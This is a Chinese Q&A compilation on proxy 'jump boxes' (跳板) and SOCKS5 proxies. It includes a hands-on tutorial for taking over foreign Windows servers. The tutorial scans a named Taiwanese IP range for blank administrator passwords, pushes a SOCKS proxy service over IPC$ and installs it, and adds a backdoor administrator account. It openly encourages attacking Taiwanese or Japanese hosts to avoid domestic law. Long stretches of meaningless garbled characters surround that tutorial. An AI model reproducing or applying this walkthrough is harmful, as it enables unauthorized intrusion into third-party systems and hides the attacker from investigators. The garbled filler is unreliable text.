代理跳板
Ⅰ 隱藏IP的方法 做多級跳板的代理和攻擊「肉雞」有什麽區別
區別很簡單,用形象點的事兒給你解答就是:隱藏IP=你易容後去把某個仇家殺了。最專後就算你改回屬來了,但是還會留下很多蛛絲馬跡。多級跳板=你想殺某人,但是你不用自已動手,你可以唆使某人,然後某人再唆使某某人,然後就這樣加下去。。最終就算那個人被殺也基本上聯系不到你頭上了。(安全)!
Ⅱ 代理伺服器如何配置 安裝代理伺服器
著名代理軟體Snake目前最新版本1.09 http://www.hackbase.com/soft/2003-12-23/15462.html 跳板的初衷,是一個練習作品,將多個協議結合,和轉換。 技術是相通的,也是可以不斷的進行變通的。發布跳板, 只是為了表達一下技術的創新,而不是用來破壞。希望大家 在正面的角度上正確使用跳板,不要觸犯法律。!! 該軟體只是研究學習性質,請務作非法途徑使用。 snake. 2002/9/08 安裝: [圖形界面的安裝] 運行SockServerCfg,進行: --- 服務的安裝,刪除,啟動,停止,及各個參數的配置. --- 允許連接的客戶端ip的定義. --- 經過的跳板的設定 [命令行的安裝] 安裝服務: 運行 SkSockServer.exe -install 刪除服務: SkSockServer.exe -remove 啟動服務: net start skserver 停止服務: net stop skserver 運行: 程序文件為 SkSockServer.exe,以服務方式運行後,不顯示任何窗口,以sock5代理服務的方式,默認埠為1813.進行跳板代理服務. SkSockServerV1.03後增加的直接運行,不需要安裝的新功能: 命令行輸入: SkSockServer -Debug [新的埠] 運行結果: 程序不停止,這時,該機器就在 [新的埠] 進行 sock5代理服務了,還可以作為其他代理跳板的中間跳板.:) SkSockServerV1.06後增加命令行的配置功能。 由命令行設置/顯示 當前 埠,啟動方式,允許的客戶ip連接,遠程跳板設置. c:> SkSockServer -config show === [顯示所有配置] c:> SkSockServer -config port === [顯示/設置 埠] c:> SkSockServer -config StartType === [顯示/設置 服務啟動方式] c:> SkSockServer -config client [add/del] === [顯示/增加/刪除 客戶端的項目] c:> SkSockServer -config SkServer [add/del] === [顯示/增加/刪除 經過SkServer的項目] 配置文件 SockServerCfg.exe V1.04 增加 改變多個SkServer跳板的 順序的功能. 刪除: [圖形界面的刪除] 運行SockServerCfg,進行: --- 服務刪除. [命令行的刪除] 首先: net stop skserver 刪除服務: SkSockServer.exe -remove 特點: * 從本地機器連接到遠程機器, 中間通過 安裝的代理跳板。對應用程序而言,相當於普通的sock代理調用. * 在跳板之間傳輸的數據,已經被動態加密。加密種子每次不同。 * 跳板的數目由 1 到 255,不限制,當數目為0時,相當於Sock5代理伺服器. 推薦的Sock5 Client介面軟體: 在本機和遠程機器, 安裝本軟體後,和SockCap配合使用,你將會很方便的不留痕跡的通過代理的方式,連接到其他主機,這樣,你的私人通信數據將得到最大的保護!
Ⅲ 跳板的代理
一般是黑客或紅客用的,一般的用戶很少機會用得上.跳板這個概念用在代理服務上面偶是在接接觸snake的那個代理程序見到的。「代理跳板」一般都是指snake開發的那個sock5代理服務程序。代理跳板好像就是支持connect命令的http代理伺服器因為常常被當成黑軟使用
HTTP代理小常識
一、HTTP代理的匿名性
This is a proxy that hides the original users' IP address and other details from the remote server. 這種代理,對遠端伺服器隱藏原始用戶的IP地址以及其它細節(可能,但不必需)。
HTTP代理匿名性是指不通過非常技術手段,直接使用時代理的匿名安全性。(說明:這里的匿名與其它如FTP伺服器的匿名意義是不一樣的,不論匿名與否,代理伺服器均能起到「代理」的作用。只是匿名代理可以確保被訪問方不能追溯到源IP,在一定程度上更加安全而已。這並不是一個重要的指標,是否必要則仁者見仁、智者見智。)
測試自己的http代理是否匿名,簡單方法:xxx網站,先看「REMOTE_ADDR」顯示的ip,如果不是你本身的ip,說明代理伺服器起作用了。再看「HTTP_X_FORWARDED_FOR」,如果有,並顯示你的ip,為非匿名代理。如果沒有顯示,則為匿名代理。(Tips:看一下「HTTP_USER_AGENT」和「HTTP_ACCEPT_LANGUAGE」,你就能知道你的代理提供了多大的安全性。) 二、HTTP CONNECT代理
對於HTTP代理,不少人有認識上的誤區,有必要說明一下,不是所有的HTTP代理都只能代理HTTP的,vice versa!
HTTP CONNECT代理伺服器是一種能夠允許用戶建立TCP連接到任何埠的代理伺服器,這意味著這種代理不僅可用於HTTP,還包括FTP、IRC、RM流服務等,甚至掃描、攻擊。 三、三種代理的區別
· 全匿名代理不改變你的request fields,使伺服器端看來就像有個真正的客戶瀏覽器在訪問它。當然,你的真實IP是隱藏起來的。伺服器的網管不會認為你使用了代理。
· 普通匿名代理能隱藏你的真實IP,但會更改你的request fields,有可能會被認為使用了代理,但僅僅是可能,一般說來是沒問題的。不過不要受它的名字的誤導,其安全性可能比全匿名代理更高,有的代理會剝離你的部分信息(就好比防火牆的stealth mode),使伺服器端探測不到你的*作系統版本和瀏覽器版本。
· 透明代理(簡單代理)改編你的request fields,並會傳送真實IP。
跳板是一個程序,也可以說是一種socks5代理的應用吧。
* 從本地機器連接到遠程機器, 中間通過安裝的代理跳板。對應用程序而言,相當於普通的sock代理調用。
* 在跳板之間傳輸的數據,是已經被動態加密的。加密種子每次不同。
* 跳板的數目由1到255,不限制,當數目為0時,相當於Sock5代理伺服器
Ⅳ 怎樣製作代理跳板 詳細
莃薇蚆羆肂 荿螞羆芄蚅薈羅莇蒈褘羄 肆蚃螂羃腿蒆蚈羂芁蟻薄 肁莃蒄袃肀肅芇蝿肀膅蒃 螅聿莈芅蟻肈肇薁薇肇膀 莄褘肆節蕿螁肅莄莂蚇膄 肄薇薃膄嗉莀袂膃荿薆袈 膂蒁葿螄膁膀蚄蝕螈芃蕆 薆螇蒞螞裊螆肅蒅螁裊膇 蟻蚇襖艿蒃薃袃蒂芆羈袂 膁薂袇袂芄蒞螃袁莆薀蠆 袀肆莃薅衿膈薈襖羈芀莁 螿羇莃薇蚆羆肂荿螞羆芄 蚅薈羅莇蒈褘羄肆蚃螂羃 腿蒆蚈羂芁蟻薄肁莃蒄袃 肀肅芇蝿肀膅蒃螅聿莈芅 蟻肈肇薁薇肇膀莄褘肆節 蕿螁肅莄莂蚇膄肄薇薃膄 嗉莀袂膃荿薆袈膂蒁葿 螄膁膀蚄蝕螈芃蕆薆螇蒞 螞裊螆肅蒅螁裊膇蟻蚇襖 艿蒃薃袃蒂芆羈袂膁薂袇 袂芄蒞螃袁莆薀蠆袀肆莃 薅衿膈薈襖羈芀莁螿羇莃 薇蚆羆肂荿螞羆芄蚅薈羅 莇蒈褘羄肆蚃螂羃腿蒆蚈 羂芁蟻薄肁莃蒄袃肀肅芇 蝿肀膅蒃螅聿莈芅蟻肈肇 薁薇肇膀莄褘肆節蕿螁肅 莄莂蚇膄肄薇薃膄嗉莀袂 膃荿薆袈膂蒁葿螄膁膀蚄 蝕螈芃蕆薆螇蒞螞裊螆肅 蒅螁裊膇蟻蚇襖艿蒃薃袃 蒂芆羈袂膁薂袇袂芄蒞螃 袁莆薀蠆袀肆莃薅衿膈薈 襖羈芀莁螿羇莃薇蚆羆肂 荿螞羆芄蚅薈羅莇蒈褘羄 肆蚃螂羃腿蒆蚈羂芁蟻薄 肁莃蒄袃肀肅芇蝿肀膅蒃 螅聿莈芅蟻肈肇薁薇肇膀 莄褘肆節蕿螁肅莄莂蚇膄 肄薇薃膄嗉莀袂膃荿薆袈 膂蒁葿螄膁膀蚄蝕螈芃蕆 薆螇蒞螞裊螆肅蒅螁裊膇 蟻蚇襖艿蒃薃袃蒂芆羈袂 膁薂袇袂芄蒞 螃袁莆薀蠆 怎樣製作代理跳板 特別提醒:千萬不要做國內的主機啊!做日本或者阿扁(台灣)吧,這樣既不違反 我們國家的法律,也體現了自己的愛國心,哈哈(摘錄別人的話),不過最好還是老老實實的做跳板,不要總是去想著做什麼壞事。 千萬不要用國內的主機做試驗啊,否則等著警車來接你啦 怎樣製作代理跳板 說明:(1)這篇文章是我自己做跳板的一點體會,是些給那些從來沒有做過跳板的網友看的。做過跳板的網友就不用看了。 (2)本文講述的是做跳板最簡單,最基礎的方法,僅僅是給新手提供一個思路,一些稍微復雜的方法比如unicode,CGI 等等這里不講。 (3)做跳板畢竟算是一種入侵行為,有了跳板和肉雞以後,千萬要用在該用的地方,不要刻意去「黑「別人啊!! 准備工作: 做一件事情,至少需要兩個方面的准備工作:相關的基礎知識和做這件事情的工具。 基本的工具:(1)x-scan v1.3:強大的漏洞掃描工具,對於初學者來說非常好的一個工具。我們主要用他來掃描一些基本的漏洞(主要是NT 弱密碼),用法在後面會具體說。(其實流光很不錯的,但是我覺得流光再掃NT 弱密碼的時候太煩了) (2)superscan:非常快速的埠掃描工具,可以在很短的時間里發現某個 IP 域上 IP 的分布。為什麼用他呢?主要是避免盲目掃描,提高效率:某個 IP 域上IP 地址的分布不是連續的,也許他從xxx.xxx.0.0-xxx.xxx.50.255 上每個IP 都是有計算機存在的,而從 xxx.xxx.51.0- xxx.xxx.100.255 每個IP 都沒有計算機存在。如果你事先不知道這一段上根本沒有主機的話,花了很長時間去掃描也不會有結果,浪費時間和金錢 啊。 (3)fluxay 4.0:大名鼎鼎的掃描工具,我們主要用它的NT 管道命令功能來連接目標主機,以及添加用戶、遠程啟動服務等。注意了:最好是fluxay 4.0 版本。 (4)windows2000 下的c:\命令提示符工具:也就是說,跳板的製作至少是要在windows2000 以上的操作系統下進行。 (5)sksockserver.exe:做跳板的主角,就是用它來實現遠程主機的socks5 代理功能的。 (6)全球IP 地址分配表:這個對於高手來說是不必要的,用他的目的是考慮到很多以前沒有做過跳板的網友對IP 的分布不了解,我們主要的目標還是國外的主 機,因此對國外的IP 分布有一些了解是很重要的,也是以後我們選定所要掃描的 IP 域的主要根據。這樣的話,就省得再去用「追捕」軟體查找IP 的實際所在地 了。 好了工具准備完了,現在了解一下做跳板的大概過程。 注意:剛才你下載的這些東東不是放在你的硬碟上!放在什麼地方呢?放在「肉雞」上! 就是說我們做跳板的過程是在肉雞上完成的。 名詞解釋肉雞:肉雞是開了3389 埠微軟終端服務(microsoft terminal service),又有弱密碼的高速伺服器,俗稱「肉雞」。我們之所以要在肉雞上做,是出於安全考慮,因為做跳板畢竟是一種非法入侵行為,我們需要隱藏自 己的蹤跡,當然,不想用肉雞也可以,前提是你有足夠的帶寬,而且不怕公安上門找你麻煩。(當然,進入肉雞本身也是一種非法的入侵)。我們用 mstsc.exe 這個軟體登陸上肉雞,就可以像平時我們在自己電腦上一樣用滑鼠控制遠 程的伺服器(也就是肉雞)做我們要做的事情。 過程:為了敘述的方便,先假設我們已經有了一個肉雞。下面的步驟沒有特殊說明都是在「肉 雞」上完成的。 (1) 先在自己的機器上打開全球IP 地址分配表,選取一個IP 區域 (2) 登陸上肉雞,把剛才說到的工具在肉雞上下載好,就用肉雞自己的IE 下載就行了。 (3) 主要的過程是:先用superscan 掃描(1)選定的IP 區域,找到其中一個IP 很集中的區域,然後放到x-scan 進行漏洞掃描(因為是面對以前沒有 做過跳板的網友,所以這里只介紹用NT 弱密碼製作跳板),找到若干個有弱密碼的IP,把sksockserver.exe 上傳到目標主機上,然後遠程啟動 sksockserver。這樣,跳板就做好了。 我們一起來實踐一下,做一個跳板: (1) 剛才說過了,沒有肉雞做跳板是不行的,尤其是撥號上網的網友(速度慢)。我們首先登陸上一個已經知道的肉雞:xxx.xxx.xxx.xxx。幫剛才上面 提到的東東都准備好。最好是集中放置,這樣便於我們使用。不要到處亂放,否則主人一進來就知道有人進過他的機器。 (2) 我們選擇210.85.0.0-210.85.50.255 這一段IP(台灣),放在superscan裡面去,把superscan 的埠設置改成只有 80 一個埠,然後確定,開始掃描。這時,在下面的輸出框裡面,就會出現一大批的活躍 IP,看見了嗎?210.85.0.0-210.85.40.255 這一段上都是活躍的 IP。現在我們隨便選一個IP 區域,比如我們就選210.85.0.0-210.85.5.255 這一段,不要太長,因為下一步我們要 把他們放進x-scan 進行掃描,x-scan 掃描速度並不是很快,太多的話,會降低效率,而且IP 區域過長的話,有可能使x-scan 出現誤報。 x-scan 的使用方法這里就不詳細敘述了這里要做的就是:在「設置」菜單里,先選「掃描模塊」,選擇「開放埠」和「NT 弱密碼」兩個選項,在「掃描參 數」里,填上我們剛才選定的 IP 范圍:210.85.0.0-210.85.5.255,接著,在其中「埠相關設置」里,把原先一長串的埠去掉,只填 上80,3389 兩個埠,其他的設置就用默認的好了,不用再改了。然後就開始搜索,這需要大概你 8、9 分鍾的時間(因為 x-scan 雖然簡單,但是速度慢),這段時間你大可以做一點自己的其他事情,等時間差不多了,你再看看 x-scan 裡面的結果:好的,N 個機器的密碼為空,這下子有收獲了!但是要說的 是,x-scan 有一些誤報,大家一定要有耐心去試啊! (3) 我們隨便從中間隨便選了一個,比如:210.85.0.14:administrator 空。接下來的事情, 是要驗證它到底接不接受我們的連接,密碼是不是正確。現在用到流光了,打開流光,選擇「工具」裡面的「NT管道遠程命令」,出現對話框,把剛才的IP,用戶名,密碼填進去,然後回車。在界面上「NTCMD>」提示符後面打入CMD,連接成功,屏幕上出現了「C: \WINNT\ SYSTEM32>」的提示符。這證明,剛才的用戶名和密碼是正確的,這台機器已經基本是你的了。好了,我們進去了,想想我們要做什麼呢?對了,是做跳板,我們還要把sksockserver.exe 放到210.85.0.14 上,這樣才能啟動服務,讓這台機器做為跳板!怎麼把這個東東放上去呢: 調出肉雞上的CMD,在命令提示符下按下面的方法做: c:\net use \\210.85.0.14\ipc$ 「」/user:「administrator」(建立IPC 連接) 系統提示:命令成功完成。 Copy c:\sksockserver.exe \\210.85.0.14\admin$ 系統提示:成功復制一個文件。 這樣我們就成功地把 sksockserver.exe 傳到了目標主機上。接下來的任務就是把他遠程啟動就行了。 我們又回到剛才流光的NTCMD 里,在提示符下按下面的方法做: c:\sksockserver –install 系統提示:snake sockproxy service installed c:\sksockserver –config port 1949(埠自己來定,這里的1949 是隨便選的) 系統提示:the port value have set to 1949 c:\sksockserver –config starttype 2 系統提示:the starttype have set to 2---auto c:\net start skserver 系統提示服務啟動成功。 這個時候,這台機器已經成為你的跳板了。 下面簡單的說一說自己找肉雞的方法。 工具:(1)sockscap:強大的socks 代理調度軟體。 (2)snake 的代理跳板GUI(圖形界面程序) (3)mstsc:微軟terminal service 終端服務的客戶端程序。用於登陸3389 肉 雞。有了它,我們就可以象控制自己的機器一樣控制終端伺服器,做我們的事情了。 其實前面兩個都是附屬的工具,只有mstsc 才是真正唱主角的。 Sockscap 和sksockserver GUI 配合實現實現跳板的使用,可以隱藏我們的 入侵痕跡。 我們現在還沒有肉雞,那麼一切事情都只能在我們自己的機器上做了,如果你不放心的話 可以到網吧去做下面的事情。 但是,要提醒的是,千萬不要做國內的主機啊!做日本或者阿扁(台灣)吧,這樣既不違反 我們國家的法律,也體現了自己的愛國心,哈哈(摘錄別人的話),不過最好還是老老實實 的做跳板,不要總是去想著做什麼壞事。 步驟其實跟做跳板也很相似的。剛才我們在x-scan 搜索的埠里設置了3389,如果一台機 器開了3389 埠,而且有了弱密碼的話,那這樣的機器就是所謂的「肉雞」了。(當然輸入 法漏洞有的時候也可以做成肉雞,但是畢竟現在有輸入法漏洞的機器太少了,遠遠不及有弱 密碼的終端伺服器那麼多,所以我們還是選擇了後者,而且輸入法漏洞只適合國內機器。一 個一個去試驗,真是太浪費時間了!會煩死的。) 具體搜索過程跟剛才在作跳板里是一樣的,找到一個開了3389 埠服務,而且有弱密碼的 機器。我們在上面搜索的結果中仔細地看看,終於發現了一台:210.85.2.84:frank41:空。而 且開了3389 服務。要把這台機器變成自己地機器那肯定要有自己的登錄名,否則每次總是 用別人的,那還怎麼叫是自己的機器?我們現在來為自己添加一個用戶名,把自己提升成為 root 許可權,那麼我們就可以做任何事情了。打開流光,選擇「工具」裡面的「NT 管道命令」 填上剛才得到的用戶名跟密碼:frank41:空。然後確定,進入NTCMD 界面,在提示符下 鍵入:CMD,連接成功以後在系統提示符下如下操作: c:\net user admin /add(添加一個admin 用戶) c:\net user admin shonline788(使得admin 的密碼是shonline788) c:\net localgroup administrators admin /add(把用戶admin 提升為administrator 即管理員身份) 這樣我們就成功的在這台機器中取得了root 許可權,可以作任何事情了,但是別做壞事噢。 下一步,就要用上我們剛才准備的這些工具了。在網上搞幾個socks 代理,把sockscap 和 sksockserverGUI 設置好,把mstsc 的圖標拖到sockscap 里去,雙擊mstsc 的圖標,在其中填 上你剛才找到的肉雞IP:210.85.2.84,然後回車進行連接。成功以後,會出現一個跟我們平 時登陸windows2000 時候一樣的一個藍色的界面,在裡面填上我們剛才添加的用戶名和密 碼,回車登陸。登陸成功以後就會出現該主機的圖形界面,這個時候你就可以象操作自己的 機器一樣,操作別人的機器。至此,你已經獲得了一台肉雞。就可以做我們上面做過的事情 了。 節蒈螅羈莂薁羈 芆莁蚃螄膂莀螅罿肈荿薅 螂肄莈蚇肈羀莇蝿袀艿莇 葿肆膅莆薁衿肁蒅蚄肄羇 蒄螆袇芆蒃蒆蝕節蒂蚈裊 膈蒁螿螈肄蒁蒀羄羀蒀薂 螆羋葿蚅羂膄薈螇螅肀薇 蕆羀羆薆蕿螃蒞薅螁羈芁 薅袃袁膇薄薃肇肅膀蚅衿 罿腿螈肅芇膈蕆袈膃羋薀 肅聿芇螞褘羅芆襖蠆莄芅 薄羄芀芄蚆螇嗉芃蝿羃肂 節蒈螅羈莂薁羈芆莁蚃螄 膂莀螅罿肈荿薅螂肄莈蚇 肈羀莇蝿袀艿莇葿肆膅莆 薁衿肁蒅蚄肄羇蒄螆袇芆 蒃蒆蝕節蒂蚈裊膈蒁螿螈 肄蒁蒀羄羀蒀薂螆羋葿蚅 羂膄薈螇螅肀薇蕆羀羆薆 蕿螃蒞薅螁羈芁薅袃袁膇 薄薃肇肅膀蚅衿罿腿螈肅 芇膈蕆袈膃羋薀肅聿芇螞 褘羅芆襖蠆莄芅薄羄芀芄 蚆螇嗉芃蝿羃肂節蒈螅羈 莂薁羈芆莁蚃螄膂莀螅罿 肈荿薅螂肄莈蚇肈羀莇蝿 袀艿莇葿肆膅莆薁衿肁蒅 蚄肄羇蒄螆袇芆蒃蒆蝕節 蒂蚈裊膈蒁螿螈肄蒁蒀羄 羀蒀薂螆羋葿蚅羂膄薈螇 螅肀薇蕆羀羆薆蕿螃蒞薅 螁羈芁薅袃袁膇薄薃肇 肅膀蚅衿罿腿螈肅芇膈蕆 袈膃羋薀肅聿芇螞褘羅芆 襖蠆莄芅薄羄芀芄蚆螇嗉 芃蝿羃肂節蒈螅羈莂薁羈 芆莁蚃螄膂莀螅罿肈荿薅 螂肄莈蚇肈羀莇蝿袀艿莇 葿肆膅莆薁衿肁蒅蚄肄羇 蒄螆袇芆蒃蒆蝕節蒂蚈裊 膈蒁螿螈肄蒁蒀羄羀蒀薂螆羋葿 蚅羂膄薈螇螅肀薇蕆羀羆 薆蕿螃蒞薅螁羈芁薅袃袁 膇薄薃肇肅膀蚅衿罿腿螈 肅芇膈蕆袈膃羋薀肅聿芇 螞褘羅芆襖蠆
Ⅳ 電腦上怎麼使用跳板與代理IP
跳板 ,通過不同軟體來進行的。每一種的使用方法也有所不同。
現在假設你版是權A,要掃的是B ,那麼,通常建立3次握手的過程是: A---Syn--->B A<---Syn/Ack---B A---Ack--->B 給一個 跳板設置代理伺服器動畫的連接:http://hack.77169.com/HTML/20060821091000.html
Ⅵ 大夥推薦幾個在線代理跳板
www.pv88.com
Ⅶ 什麼是代理跳板
無非是代理伺服器
Ⅷ 怎樣把肉雞做成SOCK5代理跳板
SOCKS5介紹如果您的機器具有一個合法的InternetIP地址,或者您利用自己機器上的數據機撥號上網,可以自由和Internet上任何主機溝通,那麼您通常不必關心SOCKS5協議。SOCKS5協議對於處在內部網路中的機器,需要透過網路中某些可以聯通外部Internet的機器訪問外部時,有用。SOCKS5是一個代理協議,它在使用TCP/IP協議通訊的前端機器和伺服器機器之間扮演一個中介角色,使得內部網中的前端機器變得能夠訪問Internet網中的伺服器,或者使通訊更加安全。SOCKS5伺服器通過將前端發來的請求轉發給真正的目標伺服器,模擬了一個前端的行為。在這里,前端和SOCKS5之間也是通過TCP/IP協議進行通訊,前端將原本要發送給真正伺服器的請求發送給SOCKS5伺服器,然後SOCKS5伺服器將請求轉發給真正的伺服器。SOCKS5伺服器在將通訊請求發送給真正伺服器的過程中,對於請求數據包本身不加任何改變。SOCKS5伺服器接收到真正伺服器的響應後,也原樣轉發給前端。因此,SOCKS5協議是一種代理協議,對於各種基於TCP/IP的應用層協議都能夠適應,幾乎是萬能的。它雖然不能理解自己轉發的數據的內部結構,但是它能夠忠實地轉發通訊包,完成協議本來要完成的功能。與SOCKS5協議不同,HTTP代理是通過HTTP協議進行的,HTTP代理伺服器軟體了解通訊包的內部結構,在轉發過程中還要對通訊進行某種程序的修改和轉換。和HTTP代理協議不同,SOCKS5實際上是一個傳輸層的代理協議。我們可以想像,如果每個具體的應用層協議都要設計對應的代理協議表達法,一個特定的代理伺服器無論如何也支持不過來那麼多新出現的協議。因此,可以說SOCKS5的出現緩解了各種具體協議需要專門設計代理協議的困難局面。不過,並不是凡是使用基於TCP/IP協議的應用協議的軟體,都可以無條件地透過SOCKS5伺服器進行通訊,還要求前端軟體本身具有SOCKS5的介面,才能利用SOCKS5代理伺服器。一個支持SOCKS5協議的前端,通常具有兩種運行狀態:1)直接通訊狀態,不使用SOCKS5介面。這時的通訊是針對最終伺服器進行的。2)SOCKS5狀態。使用SOCKS5介面將本來要發送給最終伺服器的請求發送給SOCKS5伺服器。在前端和SOCKS5伺服器進行初始化會話的時候,前端告訴了SOCKS5伺服器關於最終伺服器的IP地址和埠信息,所以SOCKS5伺服器能夠忠實按照前端的要求啟動和最終伺服器的通訊過程。埠要看你的免費代理是什麼地址也是看他們提供地址就是指那個代理的IPHTTP協議(HyperTextTransferProtocol,超文本傳輸協議)是用於從WWW伺服器傳輸超文本到本地瀏覽器的傳送協議。它可以使瀏覽器更加高效,使網路傳輸減少。它不僅保證計算機正確快速地傳輸超文本文檔,還確定傳輸文檔中的哪一部分,以及哪部分內容首先顯示(如文本先於圖形)等。這就是你為什麼在瀏覽器中看到的網頁地址都是以http://開頭的原因。地址也是HTTP代理的IP和提供的埠80
Ⅸ 什麼是跳板軟體啊
一般是黑客或紅客用的,一般的用戶很少機會用得上.跳板這個概念用在代理服務上面偶是在接觸snake的那個代理程序見到的。「代理跳板」一般都是指snake開發的那個sock5代理服務程序。代理跳板好像就是支持connect命令的http代理伺服器因為常常被當成黑軟使用
HTTP代理小常識
一、HTTP代理的匿名性
This is a proxy that hides the original users' IP address and other deta
ils from the remote server. 這種代理,對遠端伺服器隱藏原始用戶的IP地址以及其
它細節(可能,但不必需)。
HTTP代理匿名性是指不通過非常技術手段,直接使用時代理的匿名安全性。(說明
:這里的匿名與其它如FTP伺服器的匿名意義是不一樣的,不論匿名與否,代理伺服器均
能起到「代理」的作用。只是匿名代理可以確保被訪問方不能追溯到源IP,在一定程度
上更加安全而已。這並不是一個重要的指標,是否必要則仁者見仁、智者見智。)
測試自己的http代理是否匿名,簡單方法:xxx網站
,先看「REMOTE_ADDR」顯示的ip,如果不是你本身的ip,說明代理伺服器起作用了。再
看「HTTP_X_FORWARDED_FOR」,如果有,並顯示你的ip,為非匿名代理。如果沒有顯示
,則為匿名代理。(Tips:看一下「HTTP_USER_AGENT」和「HTTP_ACCEPT_LANGUAGE」,
你就能知道你的代理提供了多大的安全性。)
二、HTTP CONNECT代理
對於HTTP代理,不少人有認識上的誤區,有必要說明一下,不是所有的HTTP代理都
只能代理HTTP的,vice versa!
HTTP CONNECT代理伺服器是一種能夠允許用戶建立TCP連接到任何埠的代理伺服器
,這意味著這種代理不僅可用於HTTP,還包括FTP、IRC、RM流服務等,甚至掃描、攻擊
。
三、三種代理的區別
· 全匿名代理不改變你的request fields,使伺服器端看來就像有個真正的客戶
瀏覽器在訪問它。當然,你的真實IP是隱藏起來的。伺服器的網管不會認為你使用了代
理。
· 普通匿名代理能隱藏你的真實IP,但會更改你的request fields,有可能會被
認為使用了代理,但僅僅是可能,一般說來是沒問題的。不過不要受它的名字的誤導,
其安全性可能比全匿名代理更高,有的代理會剝離你的部分信息(就好比防火牆的stea
lth mode),使伺服器端探測不到你的*作系統版本和瀏覽器版本。
· 透明代理(簡單代理)改編你的request fields,並會傳送真實IP。
跳板是一個程序,也可以說是一種socks5代理的應用吧。
* 從本地機器連接到遠程機器, 中間通過安裝的代理跳板。對應用程序而言,相當於普
通的sock代理調用。
* 在跳板之間傳輸的數據,是已經被動態加密的。加密種子每次不同。
* 跳板的數目由 1 到 255,不限制,當數目為0時,相當於Sock5代理伺服器
Ⅹ 代理跳板是什麼
黑客常用的:抄一個具有輔助襲作用的機器,利用這個主機作為一個間接工具,來入侵其他主機,一般和肉雞連用。
IP跳板攻擊是利用別人的機器做中轉站來攻擊你的機器的,最實用的方法是根據攻擊IP的地址一個一個去尋找,攻擊者往往在跳板中加入路由器或者交換機(比如Cisco的產品),雖然路由器的日誌文件會記錄登陸IP,但是可以通過相關的命令清除該日誌。並且這些日誌清除後將永遠消失,因為路由器的日誌保存在flash中,一旦刪除將無法恢復。如果跳板全部用主機的話,雖然也可以清除日誌,但是現在的恢復軟體往往可以恢復這些日誌,就會留下痕跡,網路安全人員可以通過這些蛛絲馬跡可能找到自己。